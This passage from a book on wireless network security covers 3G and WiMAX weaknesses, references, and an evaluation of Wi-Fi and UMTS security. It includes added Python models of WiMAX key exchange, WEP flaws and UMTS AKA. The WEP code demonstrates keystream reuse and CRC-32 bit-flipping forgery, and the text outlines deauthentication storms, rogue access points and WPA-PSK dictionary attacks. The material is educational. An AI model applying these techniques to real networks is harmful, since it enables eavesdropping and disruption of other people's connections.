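The key exchange item in the End-to-End Approach section above asks for two mechanical guarantees: a TEK must never repeat, and a recorded TEK-exchange message must not be accepted a second time. The following Python model is an added example, not the chapter's or the standard's code. A BS-side issuer numbers every TEK message with a strictly increasing key id, wraps the TEK and authenticates the whole message under the authorization key (AK); an SS-side receiver rejects forged tags, replayed or stale ids and expired keys before installing anything. The XOR-with-keystream wrap is a constructed stand-in for the 3DES/AES key wrap, and `AK`, `TEK_LIFETIME` and the message layout are assumptions made for the example.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass
from typing import Dict, Optional, Set

AK = b"constructed-authorization-key"   # assumed to be shared by BS and SS after authorization
TEK_LIFETIME = 600.0                     # seconds; constructed value


@dataclass(frozen=True)
class TekMessage:
    key_id: int        # strictly increasing sequence number under this AK
    wrapped: bytes     # the TEK under the key wrap
    expires_at: float  # absolute expiry time in seconds
    tag: bytes         # MAC over (key_id, wrapped, expires_at) keyed with the AK


def _prf(ak: bytes, label: bytes, key_id: int) -> bytes:
    return hmac.new(ak, label + key_id.to_bytes(4, "big"), hashlib.sha256).digest()


def _wrap(ak: bytes, key_id: int, tek: bytes) -> bytes:
    """Constructed stand-in for the key wrap: XOR with a per-key-id keystream (its own inverse)."""
    keystream = _prf(ak, b"wrap|", key_id)[: len(tek)]
    return bytes(a ^ b for a, b in zip(tek, keystream))


def _tag(ak: bytes, key_id: int, wrapped: bytes, expires_at: float) -> bytes:
    body = key_id.to_bytes(4, "big") + wrapped + repr(expires_at).encode()
    return hmac.new(ak, b"tag|" + body, hashlib.sha256).digest()


class BsTekIssuer:
    """BS side: hands out fresh random TEKs, never reusing a key or a key id."""

    def __init__(self, ak: bytes, lifetime: float) -> None:
        self.ak, self.lifetime = ak, lifetime
        self.next_id = 0
        self.issued: Set[bytes] = set()

    def issue(self, now: float) -> TekMessage:
        tek = secrets.token_bytes(16)
        while tek in self.issued:          # vanishingly unlikely, but the rule is "never repeat"
            tek = secrets.token_bytes(16)
        self.issued.add(tek)
        key_id, self.next_id = self.next_id, self.next_id + 1
        wrapped = _wrap(self.ak, key_id, tek)
        expires_at = now + self.lifetime
        return TekMessage(key_id, wrapped, expires_at, _tag(self.ak, key_id, wrapped, expires_at))


class SsTekReceiver:
    """SS side: installs a TEK only from an authentic, fresh, unexpired message."""

    def __init__(self, ak: bytes) -> None:
        self.ak = ak
        self.last_id = -1
        self.tek: Optional[bytes] = None

    def accept(self, msg: TekMessage, now: float) -> str:
        expected = _tag(self.ak, msg.key_id, msg.wrapped, msg.expires_at)
        if not hmac.compare_digest(expected, msg.tag):
            return "bad-tag"      # forged, or altered in transit
        if msg.key_id <= self.last_id:
            return "replay"       # an earlier exchange message played back
        if now >= msg.expires_at:
            return "expired"
        self.last_id = msg.key_id
        self.tek = _wrap(self.ak, msg.key_id, msg.wrapped)   # unwrap
        return "ok"


def run_scenario() -> Dict[str, object]:
    """Drive one BS/SS pair through a rekey, a replay, a forgery and a late delivery."""
    bs, ss = BsTekIssuer(AK, TEK_LIFETIME), SsTekReceiver(AK)
    first = bs.issue(now=0.0)
    results: Dict[str, object] = {"first": ss.accept(first, now=1.0)}
    results["unwrap_matches"] = ss.tek in bs.issued
    tek_after_first = ss.tek
    second = bs.issue(now=300.0)
    results["rekey"] = ss.accept(second, now=301.0)
    results["keys_differ"] = tek_after_first != ss.tek
    results["replay_of_first"] = ss.accept(first, now=302.0)
    forged = TekMessage(second.key_id + 1, second.wrapped, second.expires_at + 1, second.tag)
    results["forged"] = ss.accept(forged, now=303.0)
    third = bs.issue(now=400.0)
    results["late_delivery"] = ss.accept(third, now=400.0 + TEK_LIFETIME + 1)
    return results


if __name__ == "__main__":
    for name, outcome in run_scenario().items():
        print(f"{name:16s} {outcome}")
```

The sequence number is what gives the exchange the "dynamic component" the text says the draft lacks: once the receiver has moved to key id 1, the recorded id-0 message is refused even though its tag is still valid, and a message whose fields were changed after tagging fails before any freshness check runs.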

Security Breaches in 3G Technologies

GSM has been around for quite some time and the security mandates in GSM were designed according to the security requirements of the time it was designed. Therefore GSM networks suffered several security issues (i.e., one-sided authentication mechanisms). As the technology evolved and matured, GSM/UMTS and CDMA provided the market with stronger security options.

Here are short descriptions of the security problems associated with 3G technologies:

• Subscriber identity module (SIM) forgery: SIM cards, mostly used in GSM and GPRS systems, are subject to the security threat of forgery due to one-way authorization techniques.
• Wireless application protocol (WAP) is insecure: GSM uses WAP for data security, which is considered insecure.
• Communication signaling in the clear: Most GSM communication signaling is in the clear with no protection or encryption. This makes it prone to a variety of attacks.
• Insecurity of the base station: GSM base stations are prone to man-in-the-middle attack scenarios, due to the one-way nature of the authentication scheme.
• Encryption disability: UMTS systems are susceptible to a downgrade attack, which eliminates the encryption. An attacker could disable the encryption and trap a legitimate user in a false base station scenario.
• International mobile subscriber identity (IMSI) security issue: For first-time registration of users, the IMSI is sent in clear text and an illegitimate entity could take over the session.
• Authentication key agreement (AKA) issue: Both UMTS and CDMA use AKA. AKA is based on a challenge protocol, which is an unbalanced technique, and AKA relies on the availability of a tamper-resistant smart-card in the device, which is also considered to be breakable.
• Cellular authentication and voice encryption (CAVE) issue: CDMA uses CAVE, which is based on a 64-bit authentication key (A-key) and an electronic serial number (ESN). CAVE and the ESN are considered computationally weak when a brute force attack is launched against them.

Mobile-WiMAX (802.16e)

The WiMAX specification mandates AES-CCM (Barbeau, 2005) encryption (equivalent to FIPS 140-2) between customer premises equipment (CPE) and the base stations, protecting both the MAC and the PHY layers. The device key management is based on X.509 digital certificates and public-key cryptography, which uses RSA as the public-key encryption algorithm; other security measures (i.e., confidentiality) are based on AES.

A true E2E security scheme, which is very hard to achieve in 3G technologies, is also available in 802.16e through the use of PKMv2. Therefore Mobile-WiMAX outperforms the strongest members of the 3G family.

Conclusion

WiMAX has both a sophisticated set of security protocols in its security suite and advanced bandwidth allocation mechanisms, which make it a suitable candidate for enterprise applications. The E2E security scheme is capable of providing maximum security for all data and control signals between SSs and BSs. This chapter was intended to take a closer look at the E2E security scheme for WiMAX and to address corporate security requirements. These requirements, which could be addressed by WiMAX, are as follows.

Multi-Level Security and Control ("Product Overview," 2006)

Corporate servers are usually located in highly secured data centers. All data frames should be protected with a 128-bit AES encryption technique on an end-to-end basis. Multiple levels of password and authentication methods can be used. These requirements are supported by the security mandates of WiMAX, specified by the current standards.

End-User Remote Access

End-users are able to connect remotely to a far-away server location using a secure wireless tunnel, access multimedia data, and transmit private information. Remote access is the basic requirement of a VPN, and through the deployment of WiMAX a secure and efficient VPN is achievable.

End-User Security Through Encryption (Data Security)

• AES with 128-bit keys protects the data stream automatically.
• Authentication using dual passwords and end-to-end user authentication.
• BS and CPE security: BS, CPE, and other devices could be protected through add-on security features.

Device Authentication

• Devices connected to the backbone of an enterprise will be authenticated, authorized, and protected using authentication, authorization, and certification techniques (i.e., PKMv2, X.509, etc.).
• There should be complete logging of authorized and unauthorized devices. This will allow tracking of any security violations.

Secure IMS for Fixed and Mobile Applications

Using both fixed- and mobile-WiMAX on the backbone of an enterprise or a corporate server, users will have access to the variety of IMS applications and data, including secure VoIP applications and other VPN access techniques.

Security at the CPE

The security implementations at the customer premises equipment are required to be very strong, as they are the gateways between the subscriber stations and the service provider.

WiMAX vs. Wi-Fi

Fixed- and especially mobile-WiMAX outperform the security strength of the latest version of the 802.11 family (802.11i), though 802.16e and 802.11i have many features in common.

WiMAX and IMS Security

The security features in WiMAX are mostly applied at the MAC layer (layer II), where the security sublayer is located. However, WiMAX has the option to adopt very strong security features implemented at the higher layers (i.e., the application layer) to meet the minimum security requirements for IMS applications.

Security in Fixed- and Mobile-WiMAX

Even though the security options built into mobile-WiMAX are stronger, due to the physical variations and conditions, there has been enough security built into both fixed and mobile WiMAX to ensure complete security for end-user and VPN applications.

References

Adibi, S., Bin, L., Ho, P. H., Agnew, G. B., & Erfani, S. (2006, May). Authentication authorization and accounting (AAA) schemes in WiMAX. Paper presented at the Conference on Electro/Information Technology, EIT'06.

Arend, P. V. D. (2007, March 19). Lawful interception. Retrieved October 23, 2007, from http://portal.etsi.org/li/Summary.asp

Baker, F., Foster, B., & Sharp, C. (2004, October). Cisco architecture for lawful intercept in IP networks (RFC 3924). Retrieved October 23, 2007, from http://www.educause.edu/ir/library/powerpoint/NMD0613B.pps

Barbeau, M. (2005, October 13). WiMax/802.16 threat analysis. Paper presented at Q2SWinet'05. School of Computer Science, Carleton University.



Brown, I. (2006). The Internet standards process. Retrieved October 23, 2007, from http://www.cs.ucl.ac.uk/staff/I.Brown/infosoc-course/internetstandards.ppt

Chandra, P. (2002, July 30). Securing WLAN links: Part 3. Telogy Networks. Retrieved October 23, 2007, from http://www.CommsDesign.com

Gast, M. (2004). The top seven security problems of 802.11 wireless (Airmagnet technical white paper).

Johnston, D., & Walker, J. (2004). Overview of IEEE 802.16 security. International Journal.

Mulholland, C. (2006, February 8). Cisco Systems lawful intercept capabilities.

Mylavarapu, R. (2005, August 1). Security considerations for WiMAX-based converged network. RFDESIGN.

Part 16: Air Interface for Fixed Broadband Wireless Access Systems, IEEE Std 802.16-2004 (http://standards.ieee.org/getieee802/download/802.16-2004.pdf)

Product Overview. (2006). Citrix GoToMyPC Corporate. Retrieved October 23, 2007, from https://www.gotomypc.com/downloads/pdf/m/GoToMyPC_Corporate_Product_Overview.pdf

Saito, Y. (2003, December). IPv6 and new security paradigm. NTT Communications.

Technical Specification Group Services and System Aspects; 3G Security; Access security for IP-based services (Release 5). ARIB STD-T63-33.203, 2002-06.




Chapter XLVIII
Evaluation of Security
Architectures for Mobile
Broadband Access
Symeon Chatzinotas
University of Surrey, UK

Jonny Karlsson
Arcada University of Applied Sciences, Finland

Göran Pulkkis
Arcada University of Applied Sciences, Finland

Kaj Grahn
Arcada University of Applied Sciences, Finland

Abstract

During the last few years, mobile broadband access has been a popular concept in the context of fourth generation (4G) cellular systems. After the wide acceptance and deployment of wired broadband connections, such as DSL, the research community in conjunction with the industry has tried to develop and deploy viable mobile architectures for broadband connectivity. The dominant architectures which have already been proposed are Wi-Fi, universal mobile telecommunications system (UMTS), WiMax, and flash-orthogonal frequency division modulation (OFDM). In this chapter, we analyze the protocols with respect to their security mechanisms. First, a detailed description of the authentication, confidentiality, and integrity mechanisms is provided in order to highlight the major threats. Subsequently, each threat is evaluated based on three factors: likelihood, impact, and risk. The technologies are then compared taking their security evaluation into account. Flash-OFDM is not included in this comparison since its security specifications have not been released. Future trends of mobile broadband access, such as the evolution of WiMax, mobile broadband wireless access (MBWA), and 4G, are discussed.

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
Evaluation of Security Architectures for Mobile Broadband Access

Introduction

During the last decade, wireless network technologies have greatly evolved and have been able to provide cost-efficient solutions for voice and data services. Their main advantages over wired networks are that they avoid expensive cabling infrastructure and they support user mobility and effective broadcasting. As a result, mobile wireless networks have managed to take over a large percentage of the “voice” market, since the global system for mobile communications (GSM) cellular technology has promoted the worldwide expansion of mobile telephony. Furthermore, nowadays broadband Internet has become a necessity for many home and business users. Moreover, in the context of all-IP network convergence, an increasing share of telephony subscribers is migrating towards VoIP solutions, mainly due to the decreased cost compared to fixed telephony. Therefore, the main challenge is to find spectrum- and cost-efficient solutions for the provision of mobile broadband services. In this direction, a large research community of academic and industrial origin has dedicated considerable effort to designing, implementing, and deploying systems for mobile broadband access, such as Wi-Fi, universal mobile telecommunications system (UMTS), WiMax, and flash-orthogonal frequency division modulation (OFDM). According to the predictions, in the years to come, more and more of our voice samples and data packets will be carried over wireless broadband links through the Internet. Therefore it becomes imperative that these messages are secured from malicious eavesdroppers and attackers. Especially in applications such as e-banking, e-commerce, and e-government, the revelation of sensitive data to unauthorized persons, unauthorized data submission, and/or the interruption of system availability can cause financial damage, surveillance of user preferences, industrial espionage, and/or administrative overhead.

The purpose of this chapter is to analyze and compare the security architectures of the dominant mobile broadband technologies. More specifically, the objectives are to:

• Describe and analyze the security architectures of mobile broadband technologies.
• Identify the strong and weak points of each technology in terms of access control based on authentication, confidentiality, integrity, and physical layer resilience.
• Compare the investigated security architectures based on a risk evaluation of the identified security vulnerabilities.

Mobile Broadband Technologies

This section discusses the mobile technologies Wi-Fi, UMTS, WiMax, and flash-OFDM. Authentication performance, confidentiality, and integrity mechanisms for each technology are analyzed.

Wi-Fi

Wi-Fi was the first widely-deployed technology for wireless computer networks. It was originally designed to provide portability support in local area networks (LANs). However, Wi-Fi has also been utilized in other scenarios, such as wireless metropolitan area networks (WMANs), since it was the first wireless technology with support for mobile communication and for a wide range of portable and mobile devices.

The Wi-Fi radio interface is based on the IEEE 802.11 standard and is available in three versions:

• 802.11a
  ° Frequency: 5.5 GHz
  ° Modulation: OFDM
  ° Bandwidth: 54 Mbps
• 802.11b
  ° Frequency: 2.4 GHz
  ° Modulation: Direct sequence spread spectrum (DSSS)
  ° Bandwidth: 11 Mbps
• 802.11g
  ° Frequency: 2.4 GHz
  ° Modulation: OFDM
  ° Bandwidth: 54 Mbps


In this context, the Wi-Fi Alliance is an organization testing products in order to evaluate that they correctly implement the set of standards defined in the IEEE 802.11 specification. After the products have successfully passed these tests, they are allowed to use the Wi-Fi logo.

Security Architecture

Wi-Fi security standards include wired equivalent privacy (WEP), Wi-Fi protected access (WPA), and WPA2. WEP was the first introduced security standard. WPA was designed to be a security protocol that corrects the security deficiencies of WEP and to be backward compatible with existing hardware. The last development in Wi-Fi security is the WPA2 standard, which was published in June 2004 by the IEEE 802.11i group. WPA2 was designed to offer a further improved security scheme (Edney & Arbaugh, 2003). The aforementioned security specifications are analyzed and compared in the following paragraphs.

Authentication

Authentication services are utilized to allow a client to communicate with the serving access point. After successful authentication, a session is initiated and it can be terminated by either the client or the access point. Wi-Fi provides the following link-layer authentication schemes:

• Closed system authentication
• Media access control (MAC) filtering
• WEP authentication—Shared RC4 key
• WPA and WPA2 authentication—802.1X/extensible authentication protocol (EAP)

Closed system authentication, MAC filtering, and WEP authentication are not recommended due to their well-known serious security flaws (Borisov, Goldberg, & Wagner, 2001; Lynn & Baird, 2002; Welch & Lathrop, 2003).

WPA and WPA2 security schemes have some major design differences from WEP, since the authentication and the confidentiality processes operate totally independently from each other (Baek, Smith, & Kotz, 2004). The authentication process of WPA and WPA2 adopts the three-entity model of IEEE 802.1X, which was originally designed for the point-to-point protocol (IEEE, 2001). The three entities involved in this protocol are the client, the access point (AP), and the authentication server (AS). First, the client requests access to the network. The AP acts as a network guard, allowing access only to the clients that the AS has authenticated. Finally, the AS is responsible for deciding whether the client is allowed to access the network. These three entities utilize EAP to exchange communication messages in order to coordinate the authentication process (Stanley, Walker, & Aboba, 2005).

In addition, there is a lighter version of WPA, called WPA-preshared key (WPA-PSK). This version is based on a shared secret key or passphrase in order to authenticate the wireless clients. As a result, an attacker can use a wireless sniffer to capture the 4-way WPA handshake, log the packets, and then try a brute force attack using a dictionary file (Van de Wiele, 2005). Thus, if WPA-PSK is deployed, the robustness of the network security totally depends on the length and the complexity of the secret key.

Encryption

Encryption services are utilized to provide confidentiality over wireless communication links. In Wi-Fi networks the following encryption schemes are available:

• WEP based on the RC4 (Ron’s Code 4) stream cipher
• WPA encryption based on the temporal key integrity protocol (TKIP)
• WPA2 encryption based on the advanced encryption standard (AES)

WEP is a weak implementation of the RC4 stream cipher and WEP encryption is thus not recommended (Borisov et al., 2001; Stubblefield, Ioannidis, & Rubin, 2002; Welch & Lathrop, 2003).
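To make the WEP design flaws concrete next to the WPA/WPA2 design choices discussed here and in the Integrity subsection below (short IV, keystream reuse, a linear CRC-32 as the only integrity check versus a longer counter-based IV and a keyed MIC), the following Python code is an added example; it is not code from the chapter or from any Wi-Fi implementation. The WEP frame layout and RC4 are modelled directly; the hardened form uses HMAC-SHA256 as a stand-in for Michael/CBC-MAC and a 48-bit sequence counter in the role of the TSC; key, IV and frame contents are constructed sample values.

```python
import hashlib
import hmac
import math
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4 key scheduling plus output generation; WEP seeds it with IV || key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_protect(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: IV || (plaintext || ICV) XOR RC4(IV || key)."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4_keystream(iv + key, len(body)))


def wep_unprotect(key: bytes, frame: bytes):
    """Decrypt and check the ICV; returns the plaintext, or None if the ICV fails."""
    iv, body = frame[:3], frame[3:]
    data = xor(body, rc4_keystream(iv + key, len(body)))
    plaintext, tag = data[:-4], data[-4:]
    return plaintext if tag == icv(plaintext) else None


def keystream_reuse_leaks_xor(key: bytes, iv: bytes, p1: bytes, p2: bytes) -> bool:
    """Two equal-length frames under the same IV share a keystream, so the XOR
    of the two ciphertexts equals the XOR of the plaintexts: a passive listener
    learns that relation without ever touching the key."""
    c1, c2 = wep_protect(key, iv, p1), wep_protect(key, iv, p2)
    return xor(c1[3:], c2[3:]) == xor(p1 + icv(p1), p2 + icv(p2))


def crc32_is_affine(a: bytes, b: bytes) -> bool:
    """CRC-32 is affine over GF(2): crc(a ^ b) == crc(a) ^ crc(b) ^ crc(0...0)."""
    zero = bytes(len(a))
    return zlib.crc32(xor(a, b)) == zlib.crc32(a) ^ zlib.crc32(b) ^ zlib.crc32(zero)


def receiver_accepts_blind_modification(key: bytes, frame: bytes, delta: bytes):
    """Because of that affinity, flipping the bits of `delta` (same length as the
    plaintext) inside the ciphertext and adjusting the encrypted ICV by
    crc(delta) ^ crc(0) yields a frame the receiver still accepts. Returns what
    the receiver accepted, or None. This is why a CRC is not a MIC."""
    adjust = (zlib.crc32(delta) ^ zlib.crc32(bytes(len(delta)))).to_bytes(4, "little")
    forged = frame[:3] + xor(frame[3:], delta + adjust)
    return wep_unprotect(key, forged)


def frames_until_iv_collision(iv_bits: int) -> int:
    """Birthday bound: frames after which a randomly chosen IV repeats with p=1/2."""
    return round(math.sqrt(2 * (2 ** iv_bits) * math.log(2)))


def mic_protect(mic_key: bytes, seq: int, plaintext: bytes) -> bytes:
    """Hardened form: a 48-bit sequence counter (the TSC's role) and a keyed MIC
    (HMAC-SHA256 as a stand-in for Michael/CBC-MAC) over counter and data."""
    header = seq.to_bytes(6, "big")
    tag = hmac.new(mic_key, header + plaintext, hashlib.sha256).digest()
    return header + plaintext + tag


class MicReceiver:
    """Accepts a frame only if the MIC verifies and the counter moved forward."""

    def __init__(self, mic_key: bytes):
        self.mic_key, self.last_seq = mic_key, -1

    def accept(self, frame: bytes):
        header, plaintext, tag = frame[:6], frame[6:-32], frame[-32:]
        expected = hmac.new(self.mic_key, header + plaintext, hashlib.sha256).digest()
        seq = int.from_bytes(header, "big")
        if not hmac.compare_digest(tag, expected) or seq <= self.last_seq:
            return None  # modified, forged, or replayed
        self.last_seq = seq
        return plaintext
```

The two numbers worth keeping in mind: with a 24-bit IV chosen at random, `frames_until_iv_collision(24)` is under five thousand frames, which a busy access point sends in minutes; with 48 bits it is on the order of twenty million, and TKIP additionally uses the value as a counter, so the receiver can reject anything it has already seen.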



WPA encryption is based on TKIP. It incorporates the basic functionalities of WEP, but improvements have been made to address the security flaws. The length of the initialization vector (IV) has been increased from 24 bits to 48 bits and therefore the possibility of reused keys has been significantly decreased. Furthermore, WPA does not directly utilize the master keys. Instead it constructs a hierarchy of derived keys to be utilized in the encryption process. Finally, WPA dynamically cycles keys while transferring data. Since keys are regularly changed, a malicious user has a very short time window to attempt an attack.

WPA2 was designed from scratch, taking the vulnerabilities of the previous security architectures into account. WPA2 allows various network implementations, but the default configuration utilizes the advanced encryption standard (AES) and the counter mode CBC-MAC protocol (CCMP). AES is a block cipher, operating on blocks of 128 bits of data, and is a replacement for the RC4 algorithm used by WPA. AES is much more robust since it has already been tested in various security architectures without revealing serious vulnerabilities. CCMP comprises two main parts. The first is the counter mode (CM), which is responsible for the privacy of the data in combination with AES. The second is the cipher block chaining message authentication code (CBC-MAC), providing data integrity checking and authentication.

Integrity

Integrity services are responsible for making sure that transmitted information is not replayed or modified during transmission. The following techniques are applicable in Wi-Fi networks:

• WEP cyclic redundancy check (CRC-32) checksum
• WPA integrity
• WPA2 integrity

The WEP checksum is a noncryptographic linear function of the plaintext. This means that multiple messages may correspond to a single 32-bit number. Hence, an experienced intruder could modify the plaintext in such a way that the checksum remains unchanged. Furthermore, due to the linearity of both the RC4 stream cipher and the CRC-32 checksum, the attacker is able to change the message even when he does not know the plaintext (Welch & Lathrop, 2003).

WPA has incorporated mechanisms for the prevention of replay attacks. More specifically, the TKIP sequence counter (TSC) based on the IVs is utilized, so that the receiver can identify and reject “replayed” messages. Furthermore, WPA uses an improved integrity mechanism in order to generate the message integrity check (MIC). This mechanism, called Michael, is able to detect possible attacks and deploy countermeasures to prevent new attacks.

WPA2 utilizes CCMP for providing integrity services. CCMP generates a MIC using the CBC-MAC method. In this method, even the slightest change in the plaintext will produce a totally different checksum.

Security Vulnerabilities

Although the Wi-Fi security architecture has been greatly improved since WEP, there are still vulnerabilities which cannot be addressed by WPA2. These vulnerabilities can lead to a number of link layer denial-of-service (DoS) attacks (Van de Wiele, 2005). All the DoS techniques described here are fairly easy to use with freely available tools found on the Internet. In most of the cases, the attacker will use different forged MAC addresses to mount DoS attacks. These attacks can be detected by specialized hardware (e.g., air monitor, security aware access point) which can detect the misuse of the infrastructure. Furthermore, this specialized hardware can notify the people responsible for the follow-up of a DoS incident and give an estimate of where the attacker is located by considering the signal and noise levels.

Disassociation Storm

Before any wireless communication can occur, a client has to send an association frame to the access point asking to join the network. Similarly,
after the end of the wireless session, the access point or client has to send a disassociation frame to terminate the connection. The frames of these messages are broadcast and can be sniffed by an attacker. The attacker can then flood the network with spoofed disassociation frames every time the client tries to join the network, thus disrupting the association process and the network access.

Authenticated / Deauthenticated Storm

The aforementioned principle can be exploited in order to disconnect a client and try to keep the client disconnected. This technique starts by sending a spoofed deauthentication frame followed by a disassociation frame in order to make sure that the client has disconnected from the legitimate access point. In a more advanced version of this attack, a fake probe request and some beacon frames are transmitted in order to force the client to connect to a rogue access point which ignores or monitors the client’s traffic.

UMTS

Universal mobile telecommunications system (UMTS) is one of the third generation (3G) wireless cellular technologies for mobile communication. Mobile devices like smartphones, laptops, and handheld computers can be used. UMTS is standardized by the 3G partnership project (3GPP) and it is mainly deployed in Europe and Japan. Theoretically UMTS supports up to 1920 Kbps data transfer rates, but currently the real world performance can reach 384 Kbps. It uses the wideband code division multiple access (W-CDMA) technology over two 5 MHz channels, one for uplink and one for downlink. The specific frequency bands originally defined by the UMTS standard are 1885-2025 MHz for uplink and 2110-2200 MHz for downlink.

In the UMTS network topology, a mobile station is connected to a visited network by means of a radio link to a particular base station (Node B). Multiple base stations of the network are connected to a radio network controller (RNC) and multiple RNCs are controlled by a general packet radio service (GPRS) support node (GSN) in the packet-switched case. The visitor location register (VLR) and the serving GSN keep track of all mobile stations that are currently connected to the network. Every subscriber can be identified by its international mobile subscriber identity (IMSI). In order to protect against profiling attacks, this permanent identifier is sent over the air interface as infrequently as possible. What is more, locally valid temporary mobile subscriber identities (TMSI) are used to identify subscribers whenever possible. Every UMTS subscriber has a dedicated home network with which the subscriber shares a long term secret key Ki. The home location register (HLR) keeps track of the current location of all subscribers of the home network. Mutual authentication between a mobile station and a visited network is carried out with the support of the current serving GSN (SGSN) or the mobile switching center (MSC)/VLR respectively.

The new series of 3.5G mobile telephony technologies, known as high speed packet access (HSPA), will provide more bandwidth to the end-user, improved network capacity to the operator, and enhanced interactivity for data applications. HSPA refers to the improvements made in the UMTS downlink, known as high speed downlink packet access (HSDPA), and the UMTS uplink, usually referred to as high speed uplink packet access (HSUPA) but also referred to as enhanced dedicated channel (E-DCH).

HSDPA provides a bandwidth of 14.4 Mbps/user. For multiple-input-multiple-output (MIMO) systems up to 20 Mbps can be achieved. Both HSDPA and HSUPA can be implemented in the standard 5 MHz carrier of UMTS networks and can coexist with original UMTS networks. As HSPA specifications refer only to the access network, there is no change required in the core network (CN) except for the high data-rate links required to handle the increase in clients’ traffic generated by HSPA.

Security Architecture

The 3G security architecture is based on GSM, but certain improvements are added in order to correct the described security vulnerabilities.

Authentication

Authentication and key agreement (AKA) is the main security protocol of UMTS in the 3GPP specification. According to AKA, a mobile device and a base station have to authenticate each other. Figure 1 provides an overview of the AKA process. The authentication vector includes the following components:

a. A random number (RAND)
b. An expected response (XRES)
c. A cipher key (CK)
d. An integrity key (IK)
e. An authentication token (AUTN)

RAND and XRES are utilized by the network to authenticate the mobile station (MS), whereas AUTN is utilized by the MS to authenticate the network. After the mutual authentication, the two communicating parties can agree on the CK and the IK which will be used throughout the rest of the session.

Figure 1. 3GPP authentication and key agreement (AKA)

Confidentiality and Integrity

UMTS employs the UMTS encryption algorithm (UEA) in order to provide information confidentiality. The encryption process of UEA is based on the f8 algorithm. One of the main improvements of UMTS is that the link layer encrypted channel is established between the MS and the GSN instead of the BS, as in GSM. Furthermore, UEA is utilized to protect not only the data channels but also certain signalling channels.

For user confidentiality UMTS utilizes the same mechanism as GSM. Instead of the IMSI, a temporary identity (TMSI) assigned by the VLR is used to identify the subscriber in the communication messages exchanged with the BS. However, the IMSI is still transmitted in clear-text over the air while establishing the TMSI. This has been proved to be a starting point for security attacks against UMTS.

Data integrity in 3GPP is assured explicitly through the UMTS integrity algorithm (UIA). The UIA operation is based on the f9 algorithm. UIA is utilized to protect both communication and signalling. UEA and UIA are presented in Figure 2.
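The AKA exchange described above, followed by the use of CK and IK for UEA/UIA-style protection, as an added example rather than code from the chapter or from 3GPP: the functions f1-f5, f8 and f9 are replaced by HMAC-SHA256 stand-ins (real USIMs use MILENAGE and KASUMI), AMF, IMSI and K are constructed values, and the USIM enforces a strictly increasing SQN where 3GPP permits a small acceptance window. The point the code makes explicit is what the USIM actually verifies about AUTN: that the home network produced it and that it is fresh, nothing about the serving network that relayed it.

```python
import hashlib
import hmac
import os

AMF = b"\x80\x00"  # authentication management field; constructed value


def f(k: bytes, tag: bytes, *parts: bytes) -> bytes:
    """Stand-in for the 3GPP functions f1-f5, f8 and f9 (MILENAGE/KASUMI in real
    networks): HMAC-SHA256 under the subscriber key, domain-separated by a tag."""
    return hmac.new(k, tag + b"".join(parts), hashlib.sha256).digest()


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class HomeNetwork:
    """HLR/AuC: holds K and a sequence number per IMSI, builds authentication vectors."""

    def __init__(self):
        self.subscribers = {}  # IMSI -> [K, SQN]

    def register(self, imsi: str, k: bytes):
        self.subscribers[imsi] = [k, 0]

    def authentication_vector(self, imsi: str) -> dict:
        rec = self.subscribers[imsi]
        k = rec[0]
        rec[1] += 1
        sqn = rec[1].to_bytes(6, "big")
        rand = os.urandom(16)
        mac = f(k, b"f1", sqn, AMF, rand)[:8]  # proves the token comes from the HN
        ak = f(k, b"f5", rand)[:6]              # anonymity key hiding SQN on the air
        autn = xor(sqn, ak) + AMF + mac
        return {"RAND": rand, "XRES": f(k, b"f2", rand)[:8],
                "CK": f(k, b"f3", rand)[:16], "IK": f(k, b"f4", rand)[:16], "AUTN": autn}


class USIM:
    """Mobile side: checks AUTN (origin and freshness), answers RES, derives CK and IK."""

    def __init__(self, k: bytes):
        self.k, self.last_sqn = k, 0

    def challenge(self, rand: bytes, autn: bytes):
        conc_sqn, amf, mac = autn[:6], autn[6:8], autn[8:]
        sqn_bytes = xor(conc_sqn, f(self.k, b"f5", rand)[:6])
        if not hmac.compare_digest(mac, f(self.k, b"f1", sqn_bytes, amf, rand)[:8]):
            return None  # MAC failure: token was not produced with our K
        sqn = int.from_bytes(sqn_bytes, "big")
        if sqn <= self.last_sqn:
            return None  # token already consumed (3GPP allows a small window; strict here)
        self.last_sqn = sqn
        return {"RES": f(self.k, b"f2", rand)[:8],
                "CK": f(self.k, b"f3", rand)[:16], "IK": f(self.k, b"f4", rand)[:16]}


def serving_network_auth(hn: HomeNetwork, usim: USIM, imsi: str):
    """SGSN/VLR side: fetch the vector, challenge the MS, compare RES with XRES.
    The vector carries nothing identifying the serving network; the USIM only
    learns that the home network issued the token and that it is fresh."""
    av = hn.authentication_vector(imsi)
    answer = usim.challenge(av["RAND"], av["AUTN"])
    if answer is None or not hmac.compare_digest(answer["RES"], av["XRES"]):
        return None
    return av["CK"], av["IK"]  # both sides now hold the same CK and IK


def keystream(ck: bytes, count: bytes, length: int) -> bytes:
    """f8-style keystream under CK (stand-in): HMAC blocks indexed by a counter."""
    blocks = b"".join(f(ck, b"f8", count, bytes([i])) for i in range(length // 32 + 1))
    return blocks[:length]


def protect(ck: bytes, ik: bytes, count: int, msg: bytes) -> bytes:
    """UEA/UIA stand-ins after AKA: encrypt under CK, append a f9-style MAC-I under IK."""
    c = count.to_bytes(4, "big")
    body = xor(msg, keystream(ck, c, len(msg)))
    return c + body + f(ik, b"f9", c, body)[:4]


def unprotect(ck: bytes, ik: bytes, frame: bytes):
    c, body, mac_i = frame[:4], frame[4:-4], frame[-4:]
    if not hmac.compare_digest(mac_i, f(ik, b"f9", c, body)[:4]):
        return None  # integrity failure: modified in transit
    return xor(body, keystream(ck, c, len(body)))
```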
Figure 2. UMTS encryption and integrity algorithm

GSM Compatibility

